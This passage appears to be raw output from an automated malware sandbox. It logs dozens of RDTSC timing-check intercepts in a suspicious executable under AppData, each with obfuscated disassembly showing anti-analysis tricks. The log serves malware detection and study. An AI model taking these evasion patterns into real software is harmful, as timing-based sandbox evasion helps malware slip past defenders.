Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96944F second address: 969455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 969455 second address: 9694BA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d movsx esi, ax 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F5828CEC308h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000015h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F5828CEC308h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov si, di 0x0000004b ja 00007F5828CEC306h 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 push eax 0x00000055 push edx 0x00000056 pushad 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9694BA second address: 9694C4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96914B second address: 96914F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 969DF5 second address: 969DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96914F second address: 96915E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC30Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96A041 second address: 96A046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 969DF9 second address: 969E07 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 969E07 second address: 969E0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96E710 second address: 96E722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b jnp 00007F5828CEC306h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96E90F second address: 96E934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F5828704A71h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96E934 second address: 96E93B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96E93B second address: 96E9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, 3ACC8044h 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F5828704A68h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 00000017h 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e sub dword ptr [ebp+122D3785h], eax 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b pushad 0x0000003c mov esi, dword ptr [ebp+122D1E23h] 0x00000042 cmc 0x00000043 popad 0x00000044 mov eax, dword ptr [ebp+122D0FD9h] 0x0000004a push 00000000h 0x0000004c push edi 0x0000004d call 00007F5828704A68h 0x00000052 pop edi 0x00000053 mov dword ptr [esp+04h], edi 0x00000057 add dword ptr [esp+04h], 00000016h 0x0000005f inc edi 0x00000060 push edi 0x00000061 ret 0x00000062 pop edi 0x00000063 ret 0x00000064 jnl 00007F5828704A6Eh 0x0000006a push FFFFFFFFh 0x0000006c mov edi, dword ptr [ebp+1246E7C2h] 0x00000072 push eax 0x00000073 push eax 0x00000074 push edx 0x00000075 jmp 00007F5828704A6Fh 0x0000007a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96E9D0 second address: 96E9D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 97180A second address: 97180F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 970988 second address: 970992 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5828CEC30Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 970992 second address: 970A25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push dword ptr fs:[00000000h] 0x0000000e je 00007F5828704A6Ch 0x00000014 jnl 00007F5828704A66h 0x0000001a sbb ebx, 1B4BFD3Ah 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F5828704A68h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000018h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 mov eax, dword ptr [ebp+122D0421h] 0x00000047 jne 00007F5828704A6Ch 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebx 0x00000052 call 00007F5828704A68h 0x00000057 pop ebx 0x00000058 mov dword ptr [esp+04h], ebx 0x0000005c add dword ptr [esp+04h], 00000018h 0x00000064 inc ebx 0x00000065 push ebx 0x00000066 ret 0x00000067 pop ebx 0x00000068 ret 0x00000069 xor ebx, 3F829395h 0x0000006f push eax 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007F5828704A6Fh 0x00000077 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9727E0 second address: 9727F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC314h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9727F8 second address: 972828 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov dword ptr [ebp+122D2388h], edi 0x00000011 push 00000000h 0x00000013 add bx, 57CBh 0x00000018 xor ebx, dword ptr [ebp+122D2964h] 0x0000001e push 00000000h 0x00000020 jnp 00007F5828704A69h 0x00000026 xchg eax, esi 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 972828 second address: 97282C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 97282C second address: 972830 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9718FB second address: 971902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 972830 second address: 972836 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 972836 second address: 972845 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC30Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 972845 second address: 972853 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 972853 second address: 972857 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 972857 second address: 972861 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828704A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9739EB second address: 9739F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9739F1 second address: 973A21 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F5828704A75h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F5828704A74h 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 973A21 second address: 973A26 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 976DB0 second address: 976DC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828704A75h 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 976DC9 second address: 976DDB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828CEC306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 976DDB second address: 976DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 976DE2 second address: 976E5D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F5828CEC308h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov edi, dword ptr [ebp+12449762h] 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007F5828CEC308h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 0000001Bh 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f push edx 0x00000030 or edi, 25FA20FFh 0x00000036 pop ebx 0x00000037 push 00000000h 0x00000039 jmp 00007F5828CEC30Ch 0x0000003e xchg eax, esi 0x0000003f push eax 0x00000040 push edx 0x00000041 pushad 0x00000042 jmp 00007F5828CEC311h 0x00000047 jmp 00007F5828CEC317h 0x0000004c popad 0x0000004d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 976E5D second address: 976E64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 976E64 second address: 976E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 976E71 second address: 976E76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 976E76 second address: 976E7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 977E32 second address: 977E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 je 00007F5828704A6Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 97E5CF second address: 97E5E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828CEC314h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 97A77C second address: 97A79B instructions: 0x00000000 rdtsc 0x00000002 jl 00007F5828704A6Ch 0x00000008 jc 00007F5828704A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F5828704A6Ch 0x00000019 jnc 00007F5828704A66h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9805FA second address: 9805FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 97B744 second address: 97B74A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 98822D second address: 988254 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F5828CEC316h 0x00000009 jmp 00007F5828CEC30Dh 0x0000000e rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 987DAF second address: 987DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 98D700 second address: 98D704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 98D704 second address: 98D747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F5828704A74h 0x0000000d push ebx 0x0000000e jnp 00007F5828704A66h 0x00000014 pop ebx 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F5828704A72h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 push ebx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 98D860 second address: 98D865 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 98D865 second address: 98D8AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828704A73h 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f jmp 00007F5828704A70h 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F5828704A77h 0x0000001f rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 98D8AF second address: 7BEA92 instructions: 0x00000000 rdtsc 0x00000002 je 00007F5828CEC308h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e add cx, A55Fh 0x00000013 popad 0x00000014 push dword ptr [ebp+122D1685h] 0x0000001a jns 00007F5828CEC309h 0x00000020 pushad 0x00000021 cld 0x00000022 popad 0x00000023 call dword ptr [ebp+122D389Ah] 0x00000029 pushad 0x0000002a jns 00007F5828CEC31Dh 0x00000030 pushad 0x00000031 jmp 00007F5828CEC315h 0x00000036 popad 0x00000037 xor eax, eax 0x00000039 add dword ptr [ebp+122D1A4Ch], ecx 0x0000003f mov edx, dword ptr [esp+28h] 0x00000043 pushad 0x00000044 mov dword ptr [ebp+122D1EFAh], edi 0x0000004a popad 0x0000004b mov dword ptr [ebp+122D29CCh], eax 0x00000051 js 00007F5828CEC312h 0x00000057 sub dword ptr [ebp+122D1F2Ch], ecx 0x0000005d mov esi, 0000003Ch 0x00000062 cld 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 mov dword ptr [ebp+122D1A4Ch], esi 0x0000006d lodsw 0x0000006f jmp 00007F5828CEC318h 0x00000074 add eax, dword ptr [esp+24h] 0x00000078 clc 0x00000079 mov ebx, dword ptr [esp+24h] 0x0000007d stc 0x0000007e push eax 0x0000007f push esi 0x00000080 push eax 0x00000081 push edx 0x00000082 pushad 0x00000083 popad 0x00000084 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 993176 second address: 993187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F5828704A66h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 993187 second address: 99318B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9929F7 second address: 9929FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 9929FC second address: 992A02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 992A02 second address: 992A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 992A08 second address: 992A0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 992B62 second address: 992B86 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F5828704A71h 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 992B86 second address: 992B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007F5828CEC306h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 992B9A second address: 992BAE instructions: 0x00000000 rdtsc 0x00000002 je 00007F5828704A66h 0x00000008 js 00007F5828704A66h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 992BAE second address: 992BB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 992BB2 second address: 992BB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 992BB8 second address: 992BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F5828CEC306h 0x00000009 jbe 00007F5828CEC306h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 993009 second address: 99300D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 99300D second address: 993016 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 993016 second address: 99301B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 97B7F3 second address: 97B810 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F5828CEC318h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 97C762 second address: 97C766 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 97E886 second address: 97E88A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 923EB2 second address: 923ED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F5828704A75h 0x0000000b jl 00007F5828704A66h 0x00000011 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 923ED3 second address: 923EDD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 923EDD second address: 923EE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96B28F second address: 96B296 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 97F66B second address: 97F685 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5828704A6Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b jns 00007F5828704A6Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96B296 second address: 94BEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ebp 0x0000000b call 00007F5828CEC308h 0x00000010 pop ebp 0x00000011 mov dword ptr [esp+04h], ebp 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc ebp 0x0000001e push ebp 0x0000001f ret 0x00000020 pop ebp 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D278Ch], ebx 0x00000028 call dword ptr [ebp+122D3874h] 0x0000002e push ecx 0x0000002f jmp 00007F5828CEC30Ah 0x00000034 pop ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F5828CEC30Bh 0x0000003c push eax 0x0000003d push edx 0x0000003e push eax 0x0000003f pop eax 0x00000040 jmp 00007F5828CEC318h 0x00000045 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96B7FA second address: 96B7FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\RoamingCBFCFBFBFB.exe	RDTSC instruction interceptor: First address: 96B7FE second address: 7BEA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 nop 0x00000008 or dword ptr [ebp+1246E724h], eax 0x0000000e push dword ptr [ebp+122D1685h] 0x00000014 push 00000000h 0x00000016 push ebx 0x00000017 call 00007F5828CEC308h 0x0000001c pop ebx 0x0000001d mov dword ptr [esp+04h], ebx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ebx 0x0000002a push ebx 0x0000002b ret 0x0000002c pop ebx 0x0000002d ret 0x0000002e mov dword ptr [ebp+122D24A2h], ecx 0x00000034 call dword ptr [ebp+122D389Ah] 0x0000003a pushad 0x0000003b jns 00007F5828CEC31Dh 0x00000041 xor eax, eax 0x00000043 add dword ptr [ebp+122D1A4Ch], ecx 0x00000049 mov edx, dword ptr [esp+28h] 0x0000004d pushad 0x0000004e mov dword ptr [ebp+122D1EFAh], edi 0x00000054 popad 0x00000055 mov dword ptr 